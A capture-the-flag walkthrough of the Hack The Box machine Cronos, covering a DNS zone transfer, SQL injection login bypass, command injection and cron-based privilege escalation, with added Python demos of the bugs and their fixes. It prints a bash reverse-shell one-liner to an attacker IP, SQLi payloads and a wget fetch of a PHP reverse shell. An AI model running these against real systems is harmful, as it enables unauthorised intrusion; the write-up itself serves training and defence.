HTB - Cronos
Linux | DNS | dig | SQLi | cron
Tools For This Room
dig - Domain Information Groper - allows interaction with Domain Name Servers - more information and examples here
List of SQLi inputs - https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b
TL;DR / Executive Summary
Scan and enumerate with nmap and dig
Gain foothold through SQLi
Privesc using cron job
Scanning & Enumeration
Let's start off with the usual nmap scans.
nmap
nmap -sV -sC -vv <IP>
We get three open ports:
22: SSH
53: DNS
80: HTTP
Checking out port 80 only yields the default Ubuntu page.

Port 53 being open on TCP is worth a closer look. Ordinary DNS queries travel over UDP 53; TCP 53 is used for zone transfers (AXFR) and for responses too large for UDP, so a name server that exposes it may hand us its whole zone. Let's enumerate it with dig (Domain Information Groper) to see which domain names map to this IP. But first, let's add "cronos.htb" to the /etc/hosts file.
sudo gedit /etc/hosts
<IP> cronos.htb
dig is a tool which allows us to interact with DNS name servers to get information. Check out this article by Linuxize for a detailed explanation along with some example commands.
dig axfr @<IP> cronos.htb

The zone transfer succeeds, so the server hands us every record in the cronos.htb zone: cronos.htb, admin.cronos.htb, ns1.cronos.htb and www.cronos.htb all point at the same host. Let's add all of these to our /etc/hosts file.
Checking out the new domain names yields nothing except admin.cronos.htb, which gives us a login page:
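As an added example (not part of the original writeup), here is a small Python parser for dig axfr output that turns the A records into /etc/hosts lines, which saves the manual copy-and-paste when a zone has many names. The zone transfer text embedded below is a constructed sample in dig's output format; the IP 10.10.10.13 and the TTL values are placeholders, not data taken from the page.

```python
import re
from collections import defaultdict

# Constructed sample of `dig axfr @<IP> cronos.htb` output (not the real zone);
# IP and TTLs are assumptions chosen for illustration.
SAMPLE_AXFR = """\
; <<>> DiG 9.16.1-Ubuntu <<>> axfr @10.10.10.13 cronos.htb
;; global options: +cmd
cronos.htb.\t\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.\t\t604800\tIN\tNS\tns1.cronos.htb.
cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13
ns1.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
www.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
cronos.htb.\t\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 30 msec
"""

# One resource record per line: NAME TTL IN TYPE TARGET. Only address records
# and CNAMEs matter for a hosts file; SOA/NS/MX lines are skipped.
RECORD_RE = re.compile(
    r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>A|AAAA|CNAME)\s+(?P<target>\S+)$"
)


def parse_axfr(text):
    """Return {ip: [hostnames]} from dig axfr output.

    A/AAAA records map directly; a CNAME is attached to the IP of its target
    when that target also appears in the zone (single level of aliasing).
    """
    ips = defaultdict(list)
    cnames = {}
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue  # dig banner, comments, statistics
        m = RECORD_RE.match(line)
        if not m:
            continue
        name = m["name"].rstrip(".")
        if m["type"] == "CNAME":
            cnames[name] = m["target"].rstrip(".")
        elif name not in ips[m["target"]]:
            ips[m["target"]].append(name)
    for alias, target in cnames.items():
        for names in ips.values():
            if target in names and alias not in names:
                names.append(alias)
    return dict(ips)


def hosts_lines(text):
    """Render parse_axfr() output as lines ready to append to /etc/hosts."""
    return [
        f"{ip} {' '.join(names)}"
        for ip, names in sorted(parse_axfr(text).items())
    ]


if __name__ == "__main__":
    print("\n".join(hosts_lines(SAMPLE_AXFR)))
```

Pipe real output straight in (`dig axfr @<IP> cronos.htb | python3 axfr_hosts.py` with a `sys.stdin.read()` in place of the sample) and append the result to /etc/hosts; a zone with dozens of virtual hosts then takes seconds to wire up instead of minutes.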

Gaining Foothold
After trying the usual default logins such as admin/password, we can give SQL injection a shot. This is trial and error, and tedious, but we have no credentials and the other virtual hosts don't look promising. Ismail Tasdelen has put together a fairly comprehensive list of injections (linked under Tools above). We'll copy all the input under the section titled "SQL Injection Auth Bypass Payloads" and paste it into a .txt file.
gedit SQLi_Auth.txt
// paste input into this file //
Let's use Burp to try out the different SQLi inputs. Once we've started up Burp, turn on FoxyProxy and click "submit" on the login page. Switching to Burp, we'll notice that the "Proxy" tab has now turned orange, and if we click on it, we'll see a page like this:

Right click and select "Send to Intruder". Now we'll notice that the tab "Intruder" to the right of "Proxy" is highlighted in orange too. Head over to "Intruder" and we'll notice a similar output, except some fields are highlighted in purple. Click on the "Clear §" button to the right of the page, and the purple fields will be removed. Now place the cursor after "username=" and click "Add §" twice. This creates the field which we will input the SQLi.

Let's switch over to the "Payloads" tab to upload our SQLi inputs. Under Payload Options, click "Load..." and upload the .txt file which we made earlier. We'll see the list populated here:

Now we're all set, so let's hit the shiny orange "Start attack" button. After a while, Burp will have tried every payload as the username. The "Status" column tells us which ones did something different: a failed login comes back with the usual status, while a successful bypass redirects us onward, so the payloads that return 302 are the likely candidates. Sorting by status (or by response length) picks them out quickly.

Back on the login page in our browser, we can turn off FoxyProxy. Now try one of the payloads that returned a 302 as the username, leaving the password blank.

Looks like it works, and we're in.
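Why some payloads in that list log us in and others don't comes down to how the injected text rewrites the query. The following Python is an added example (not the box's code and not from the writeup) that rebuilds the bug in an in-memory SQLite table with a constructed user row: the vulnerable login pastes the username into the SQL text, the safe one binds it as a parameter, and three payloads from the same style as the auth-bypass list are tried with a blank password exactly as in the Intruder run.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the admin panel's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 'correct horse battery staple')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The bug: input becomes part of the SQL text, so a quote closes the
    string literal and a comment marker discards the password check."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised: the driver sends values separately; they never become SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Three payloads in the style of the auth-bypass list, each submitted as the
# username with an empty password. `-- ` is the SQL comment marker; MySQL also
# accepts `#`, which SQLite does not.
PAYLOADS = [
    "admin' -- ",     # username='admin' -- ' AND password=''  -> password clause gone
    "' OR 1=1 -- ",   # username='' OR 1=1 -- ...              -> first row returned
    "' OR '1'='1",    # username='' OR '1'='1' AND password='' -> AND binds first, fails
]


def run_payloads():
    """Map each payload to (vulnerable result, safe result)."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, ""), login_safe(conn, p, "")) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_payloads().items():
        print(f"{payload!r:18} vulnerable={vuln!r:8} safe={safe!r}")
```

The third payload is the instructive one: without a comment marker the trailing `AND password = ''` still applies, and because AND binds tighter than OR the row never matches. That is why, with the password left blank, the payloads that carry `-- ` or `#` are the ones that produced a 302.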

The page we land on takes an IP address as input. Since this site already has a track record of not sanitizing user input, let's try appending a command to the IP address, starting with:
; id
The output of id comes back in the response, which confirms command injection:

Let's start by setting up a netcat listener:
nc -lvnp 4444
Now we append and execute the following (10.10.14.23 is our attacking machine's IP; substitute your own):
; bash -c 'bash -i>& /dev/tcp/10.10.14.23/4444 0>&1'
We get our shell:

Navigating the directories, we find the user.txt
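The following Python is an added example, not code from the box or from the writeup, that reproduces the bug class behind that `; id` and shows the fix. The vulnerable function splices input into a shell command line (echo stands in for the ping binary so the demo runs anywhere; the shell still parses the `;`), while the hardened one allowlists a literal IP address with the ipaddress module and passes argv as a list so no shell ever sees the input. The payload string is constructed for the demo.

```python
import ipaddress
import subprocess

# Constructed stand-in for the "; id" used against the box: a valid-looking IP
# followed by a second command the shell will happily run.
PAYLOAD = "127.0.0.1; echo INJECTED"


def vulnerable_ping(target):
    """The pattern behind the bug: user input concatenated into a shell string.

    shell=True hands the whole line to /bin/sh, which treats ';' as a command
    separator. echo replaces ping here so nothing touches the network.
    """
    cmd = "echo pinging " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_ping(target):
    """Validate the shape of the input, then run without a shell.

    Returns the command output, or None if the input is not a bare IP address.
    Anything with separators, quotes, spaces or newlines fails ip_address().
    """
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        return None
    argv = ["echo", "pinging", str(ip)]  # argv list: no shell parsing at all
    return subprocess.run(argv, capture_output=True, text=True).stdout


def demo():
    """Run both versions against a clean IP and against the payload."""
    return {
        "vulnerable": vulnerable_ping(PAYLOAD),
        "hardened_valid": hardened_ping("127.0.0.1"),
        "hardened_payload": hardened_ping(PAYLOAD),
    }


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out!r}")
```

Blacklisting `;` would not have saved the application: `|`, `&&`, `$( )`, backticks and an embedded newline all reach the shell the same way. The hardened version instead checks that the input is exactly what the feature expects, an IP address, and never builds a shell command line at all.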

Privilege Escalation
We try the usual privesc checks such as SUID and history, but nothing comes up. However, as the name of this room suggests, we find an interesting file in /etc/crontab.

The first five columns are minute, hour, day of month, month and day of week, and an asterisk matches every value, so this entry fires every minute. /etc/crontab also carries a sixth column, the user the command runs as, and here that user is root. The interval only affects how long we wait; what makes this interesting for privesc is that a job running as root executes a file we may be able to change. Let's look at the artisan file to see whether we can modify it.

Looks like we have write permissions, which is great. Opening artisan with nano or gedit doesn't work, which is expected: our reverse shell isn't a proper terminal, so interactive editors fail. Rather than fight with that, let's just download a reverse shell and overwrite artisan with it. artisan is Laravel's PHP command-line script, so cron executes it with the PHP interpreter and a PHP payload dropped in its place runs the same way. We can grab Pentestmonkey's PHP reverse shell and edit it to use our IP and port.
We get a server going on our attacking machine:
python3 -m http.server 8000
(On Python 2 the equivalent is python -m SimpleHTTPServer; both serve the current directory on port 8000.)
Now, from a writable directory such as /tmp on the target, let's use wget to grab our reverse shell:
wget <ourIP>:<port>/<reverseshell.php>

We then get a netcat listener going on our attacking machine:
nc -lvnp <port>
Lastly, we overwrite artisan with our reverse shell (take a copy first if you want to put the box back the way you found it):
cp <reverseshell.php> artisan
Within the minute, we've gotten our root shell!

Grab that sweet root.txt flag and pat yourself on the back.
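To make the cron check above repeatable on the next box, here is an added Python example (not from the writeup) that parses a system crontab and reports the jobs whose executed file our user can write to, resolving interpreter invocations such as `php /path/artisan schedule:run` to the script itself. The crontab text is a constructed sample modelled on the Ubuntu default plus an artisan entry; demo() creates the files it refers to in a temporary directory with assumed permissions so the whole thing runs offline.

```python
import os
import shlex
import stat
import tempfile

# Constructed system crontab (6+ columns: m h dom mon dow user command).
# {artisan} and {safe} are filled in by demo() with temporary files.
CRONTAB_TEMPLATE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    php {artisan} schedule:run >> /dev/null 2>&1
*/5 *   * * *   www-data {safe} --quiet
"""

# When argv[0] is one of these, the file cron really executes is argv[1].
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "sh", "bash"}


def parse_system_crontab(text):
    """Yield (schedule, user, argv) for each job line; skip comments and VAR= lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        schedule, user, command = " ".join(fields[:5]), fields[5], fields[6]
        yield schedule, user, shlex.split(command)


def executed_file(argv):
    """The file whose contents run: the script given to an interpreter, else argv[0]."""
    if os.path.basename(argv[0]) in INTERPRETERS and len(argv) > 1:
        return argv[1]
    return argv[0]


def writable_by(st, uid=None, gids=None):
    """Mode-bit check (what `ls -l` shows); used instead of os.access so that
    running the audit as root gives the same answer as running it as a user."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) | {os.getgid()} if gids is None else set(gids)
    m = st.st_mode
    return (
        bool(m & stat.S_IWOTH)
        or (st.st_gid in gids and bool(m & stat.S_IWGRP))
        or (st.st_uid == uid and bool(m & stat.S_IWUSR))
    )


def find_writable_jobs(text):
    """Return [(user, path)] for jobs whose executed file we could overwrite."""
    hits = []
    for _schedule, user, argv in parse_system_crontab(text):
        path = executed_file(argv)
        if os.path.isfile(path) and writable_by(os.stat(path)):
            hits.append((user, path))
    return hits


def demo():
    """Build the referenced files with assumed modes and run the check."""
    with tempfile.TemporaryDirectory() as d:
        artisan = os.path.join(d, "artisan")   # world-writable, run as root
        safe = os.path.join(d, "backup.sh")    # read/execute only
        for path, mode in ((artisan, 0o777), (safe, 0o555)):
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")  # placeholder contents
            os.chmod(path, mode)
        crontab = CRONTAB_TEMPLATE.format(artisan=artisan, safe=safe)
        return [(u, os.path.basename(p)) for u, p in find_writable_jobs(crontab)]


if __name__ == "__main__":
    print(demo())
```

A complete audit would also flag a writable parent directory (the file can be replaced even when it is itself read-only), an interpreter or binary resolved through a writable PATH entry, and the per-user crontabs and /etc/cron.d drop-ins; the system crontab is only the first place to look.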